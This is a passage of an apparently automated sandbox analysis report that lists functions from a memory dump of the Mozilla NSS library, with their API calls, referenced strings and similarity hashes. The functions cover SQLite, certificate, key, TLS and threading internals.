Part of subcall function 6C4F4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4F4FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C55EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C55EFE4

Part of subcall function 6C61DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C4F5001,?,00000003,00000000), ref: 6C61DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C55F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C55F129
sqlite3_mprintf.NSS3(optimize), ref: 6C55F1D1
sqlite3_free.NSS3(?), ref: 6C55F368

Strings

unicode61, xrefs: 6C55EDB5
simple, xrefs: 6C55ED79
fts3, xrefs: 6C55F247
matchinfo, xrefs: 6C55F04F, 6C55F082, 6C55F0C2, 6C55F0F2, 6C55F124, 6C55F169
fts4aux, xrefs: 6C55ECF9
fts3tokenize, xrefs: 6C55F30F
fts4, xrefs: 6C55F2AD
optimize, xrefs: 6C55F199, 6C55F1CC, 6C55F211
fts3_tokenizer, xrefs: 6C55EE1A, 6C55EEA8
offsets, xrefs: 6C55EFAF, 6C55EFDF, 6C55F01F
snippet, xrefs: 6C55EF05, 6C55EF37, 6C55EF7C
porter, xrefs: 6C55ED97

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 786a66a06513756bd948796419d648fbd7c71b8e4e34d4a1c1ecd3cbd620142e
Instruction ID: fcafefe1fee16fdac355ef0cf6ed1b3ee6df535c427a4ee7865b3275d68778a6
Opcode Fuzzy Hash: 786a66a06513756bd948796419d648fbd7c71b8e4e34d4a1c1ecd3cbd620142e
Instruction Fuzzy Hash: 0F02D1B1B043018BE7049F729C8573B36B1BFC5308F54863ED85A87B41EBB5E9668786

Function 6C5D7C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5D7C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C5D7C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6C5D7D1E

Part of subcall function 6C5D7870: SECOID_FindOID_Util.NSS3(?,?,?,6C5D91C5), ref: 6C5D788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5D7D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C5D7D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C5D7DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5D7DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5D7DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C5D7E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C5D7E58

Part of subcall function 6C5D7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5D91C5), ref: 6C5D78BB
Part of subcall function 6C5D7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C5D91C5), ref: 6C5D78FA
Part of subcall function 6C5D7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C5D91C5), ref: 6C5D7930
Part of subcall function 6C5D7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5D91C5), ref: 6C5D7951
Part of subcall function 6C5D7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5D7964
Part of subcall function 6C5D7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C5D797A
Part of subcall function 6C5D7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C5D7988
Part of subcall function 6C5D7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C5D7998
Part of subcall function 6C5D7870: free.MOZGLUE(00000000), ref: 6C5D79A7
Part of subcall function 6C5D7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C5D91C5), ref: 6C5D79BB
Part of subcall function 6C5D7870: PR_GetCurrentThread.NSS3(?,?,?,?,6C5D91C5), ref: 6C5D79CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5D7E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5D7F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C5D7F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5D7FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5D7FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C5D8038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C5D8050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C5D8093
SECOID_FindOID_Util.NSS3 ref: 6C5D7F29

Part of subcall function 6C5D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C578298,?,?,?,6C56FCE5,?), ref: 6C5D07BF
Part of subcall function 6C5D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C5D07E6
Part of subcall function 6C5D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D081B
Part of subcall function 6C5D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D0825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C5D8072
SECOID_FindOID_Util.NSS3 ref: 6C5D80F5

Part of subcall function 6C5DBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C5D800A,00000000,?,00000000,?), ref: 6C5DBC3F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: 10c873763c122bbe7bf352b6fbf887b5dabbe2739cde94bf7b5d24cd09ab44c0
Instruction ID: d612870ce557c2a634885db173e52fc0abdc85f7fc1aeab4f44fc78cc68b2bd5
Opcode Fuzzy Hash: 10c873763c122bbe7bf352b6fbf887b5dabbe2739cde94bf7b5d24cd09ab44c0
Instruction Fuzzy Hash: 47E17A716093019FD710CF29DC80B5AB7E5AF84348F16096DE88A9BB65E731FC05CB9A

Function 6C561C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6C561C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C561C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C561CA1
GetLengthSid.ADVAPI32(?), ref: 6C561CA9
malloc.MOZGLUE(00000000), ref: 6C561CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C561CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C561CE4
GetLengthSid.ADVAPI32(?), ref: 6C561CEC
malloc.MOZGLUE(00000000), ref: 6C561CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C561D0F
CloseHandle.KERNEL32(?), ref: 6C561D17
AllocateAndInitializeSid.ADVAPI32 ref: 6C561D4D
GetLastError.KERNEL32 ref: 6C561D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C561D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C561D7A

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: bfdc7aa45b294b38a6d5b58200211337642432d43556219d1dba5e69343ee3fd
Instruction ID: a0b8c294880a12dc725c6f9dc9500d57bddf8d8d7c70b6c31cb87a29d11be6f9
Opcode Fuzzy Hash: bfdc7aa45b294b38a6d5b58200211337642432d43556219d1dba5e69343ee3fd
Instruction Fuzzy Hash: 903155B1A01218AFEF10EFA5CC88BAA7BB8FF4A345F004165F60992550E7315A94CF6D

Function 6C56EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C56EF63

Part of subcall function 6C5787D0: PORT_NewArena_Util.NSS3(00000800,6C56EF74,00000000), ref: 6C5787E8
Part of subcall function 6C5787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C56EF74,00000000), ref: 6C5787FD
Part of subcall function 6C5787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C57884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C56F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C56F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C56F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C56F374
PL_strcasecmp.NSS3(6C6B2FD4,?), ref: 6C56F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C56F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C56F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C56F67D
CERT_DestroyName.NSS3(?), ref: 6C56F68B

Part of subcall function 6C578320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C578338
Part of subcall function 6C578320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C578364
Part of subcall function 6C578320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C57838E
Part of subcall function 6C578320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5783A5
Part of subcall function 6C578320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5783E3

Part of subcall function 6C5784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C5784D9
Part of subcall function 6C5784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C578528

Part of subcall function 6C578900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C56F599,?,00000000), ref: 6C578955

Strings

*, xrefs: 6C56F3C6
", xrefs: 6C56F21B
oid., xrefs: 6C56F2CF

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: bada78a27817628c8d55019608c5f5562307b7beefa20242f701ae3323462b5a
Instruction ID: 2fa7e8c417303b0b76dda5cd19ca3a5b98d52ab5b607caaf60d28d63ed16635f
Opcode Fuzzy Hash: bada78a27817628c8d55019608c5f5562307b7beefa20242f701ae3323462b5a
Instruction Fuzzy Hash: 11220571E083518BD714CE2ACC9076AB7E6AB85328F184B2EE49587FB1E7319C458B52

Function 6C535F20 Relevance: 22.5, APIs: 5, Strings: 8, Instructions: 3043COMMON

Download Yara Rule

Strings

BINARY, xrefs: 6C538708, 6C538737, 6C5387B8
ON clause references tables to its right, xrefs: 6C536BEC
sub-select returns %d columns - expected %d, xrefs: 6C53805F
-, xrefs: 6C536228
-, xrefs: 6C5362F9
u, xrefs: 6C5381DA
NOCASE, xrefs: 6C538703
2, xrefs: 6C5365B4

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
API String ID: 0-3593521594
Opcode ID: f7a568d98a1bdd35d7daedd7b54c6580fabfe7824b35a8271d62fb02fc374bd6
Instruction ID: cee0022cdcef174eee5ae265a88562fb3b14b049e255e8dec5b4c89a07f59535
Opcode Fuzzy Hash: f7a568d98a1bdd35d7daedd7b54c6580fabfe7824b35a8271d62fb02fc374bd6
Instruction Fuzzy Hash: E4439374A08351CFD304CF18C990B5AB7E2BFC9358F149A5DE8998B752E731E846CB92

Function 6C511C30 Relevance: 21.5, APIs: 2, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C511D58
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C511FB7

Strings

table, xrefs: 6C511C8B
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C511F83
unsupported file format, xrefs: 6C512188
attached databases must use the same text encoding as main database, xrefs: 6C5120CA
sqlite_temp_master, xrefs: 6C511C5C
another row available, xrefs: 6C512287
abort due to ROLLBACK, xrefs: 6C512223
no more rows available, xrefs: 6C512264
sqlite_master, xrefs: 6C511C61
unknown error, xrefs: 6C512291

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 3418156520-2102270813
Opcode ID: fa65af4a4d78efb46dec336d47a2052d5986cbe81193c1465bc3b0775ee290ac
Instruction ID: 452da71164bf266d2f80b92b4dc88f646dc850b3a7d5a0267f2dc002e2da00a3
Opcode Fuzzy Hash: fa65af4a4d78efb46dec336d47a2052d5986cbe81193c1465bc3b0775ee290ac
Instruction Fuzzy Hash: FD128F7060C3418FE705CF19C888A5AB7F2BF86318F198A9DD8958BB51D731EC46CB92

Function 6C5DEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C5DDAE2,?), ref: 6C5DC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5DF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5DF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C5DF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5DF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C6A218C), ref: 6C5DF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C5DF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5DF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C5DF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C5DF210

Part of subcall function 6C5852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C5DF1E9,?,00000000,?,?), ref: 6C5852F5
Part of subcall function 6C5852D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C58530F
Part of subcall function 6C5852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C585326
Part of subcall function 6C5852D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C5DF1E9,?,00000000,?,?), ref: 6C585340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5DF227

Part of subcall function 6C5CFAB0: free.MOZGLUE(?,-00000001,?,?,6C56F673,00000000,00000000), ref: 6C5CFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C5DF23E

Part of subcall function 6C5CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C57E708,00000000,00000000,00000004,00000000), ref: 6C5CBE6A
Part of subcall function 6C5CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5804DC,?), ref: 6C5CBE7E
Part of subcall function 6C5CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5CBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5DF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C5DF3A8

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C5DF3B3

Part of subcall function 6C582D20: PK11_DestroyObject.NSS3(?,?), ref: 6C582D3C
Part of subcall function 6C582D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C582D5F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 48623f82b4f0c8c22e8bd0025acf2d7c85536884ffeadfeaf31ccab9862872f5
Instruction ID: 07922c08df3ceb8eecf5388f5fedf39e94cc2b06772b1c0930fd013e63b806d4
Opcode Fuzzy Hash: 48623f82b4f0c8c22e8bd0025acf2d7c85536884ffeadfeaf31ccab9862872f5
Instruction Fuzzy Hash: 53D15CB6E017059BEB14CFADDC80A9EB7B5EF48308F1A8229D916A7711E731F805CB54

Function 6C60DE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C5E7FFA,00000000,?,6C6123B9,00000002,00000000,?,6C5E7FFA,00000002), ref: 6C60DE33

Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390AB
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390C9
Part of subcall function 6C639090: EnterCriticalSection.KERNEL32 ref: 6C6390E5
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C639116
Part of subcall function 6C639090: LeaveCriticalSection.KERNEL32 ref: 6C63913F

Part of subcall function 6C60D000: PORT_ZAlloc_Util.NSS3(00000108,?,6C60DE74,6C5E7FFA,00000002,?,?,?,?,?,00000000,6C5E7FFA,00000000,?,6C6123B9,00000002), ref: 6C60D008

PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C5E7FFA,00000000,?,6C6123B9,00000002,00000000,?,6C5E7FFA,00000002), ref: 6C60DE57
memset.VCRUNTIME140(?,00000000,00000088), ref: 6C60DEA5
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C60E069
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C60E121
PK11_FreeSymKey.NSS3(?), ref: 6C60E14F
PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C60E195
PR_GetCurrentThread.NSS3 ref: 6C60E1FC

Part of subcall function 6C602460: PR_SetError.NSS3(FFFFE005,00000000,6C6A7379,00000002,?), ref: 6C602493

Strings

early application data, xrefs: 6C60DFC9
key, xrefs: 6C60E046
handshake data, xrefs: 6C60DFF7
application data, xrefs: 6C60DFE0

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
String ID: application data$early application data$handshake data$key
API String ID: 1461918828-2699248424
Opcode ID: 14d007e351d8bf218f983173886a37a1f8acdba44aff95c6384045b331f94d75
Instruction ID: 0ae9b2289855dd4dbfb8678768eee88ebe476283cb562bce02880afbfc9739cb
Opcode Fuzzy Hash: 14d007e351d8bf218f983173886a37a1f8acdba44aff95c6384045b331f94d75
Instruction Fuzzy Hash: 36C1F871B002159BDB08CF65CD80BEAB7B4FF49318F044279D909ABA51E731E954CBA9

Function 6C5B3850 Relevance: 21.2, APIs: 14, Instructions: 233COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5B389F
EnterCriticalSection.KERNEL32(?), ref: 6C5B38B3
PR_Unlock.NSS3(?), ref: 6C5B38F1
TlsGetValue.KERNEL32 ref: 6C5B390F
EnterCriticalSection.KERNEL32(?), ref: 6C5B3923
PR_Unlock.NSS3(?), ref: 6C5B3972
TlsGetValue.KERNEL32 ref: 6C5B3996
EnterCriticalSection.KERNEL32(0000001C), ref: 6C5B39AE
PR_Unlock.NSS3(?), ref: 6C5B39DB
PR_Unlock.NSS3(?), ref: 6C5B3A16

Part of subcall function 6C61DD70: TlsGetValue.KERNEL32 ref: 6C61DD8C
Part of subcall function 6C61DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C61DDB4

Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607AD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607CD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607D6
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4F204A), ref: 6C5607E4
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,6C4F204A), ref: 6C560864
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C560880
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,6C4F204A), ref: 6C5608CB
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608D7
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608FB

TlsGetValue.KERNEL32 ref: 6C5B3A36
EnterCriticalSection.KERNEL32(0000001C), ref: 6C5B3A4E
PR_Unlock.NSS3(?), ref: 6C5B3A77
PR_SetError.NSS3(00000000,00000000), ref: 6C5B3A8F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$calloc$ErrorLeave
String ID:
API String ID: 1642523270-0
Opcode ID: d95f581fa1554aea67b5c8dbba9898984c36fd2f65029e6d1f40016cb0fb39eb
Instruction ID: 1371a676c61b326e5577af1622a388734f51999bacd78e2727d85ef1e5db1b0f
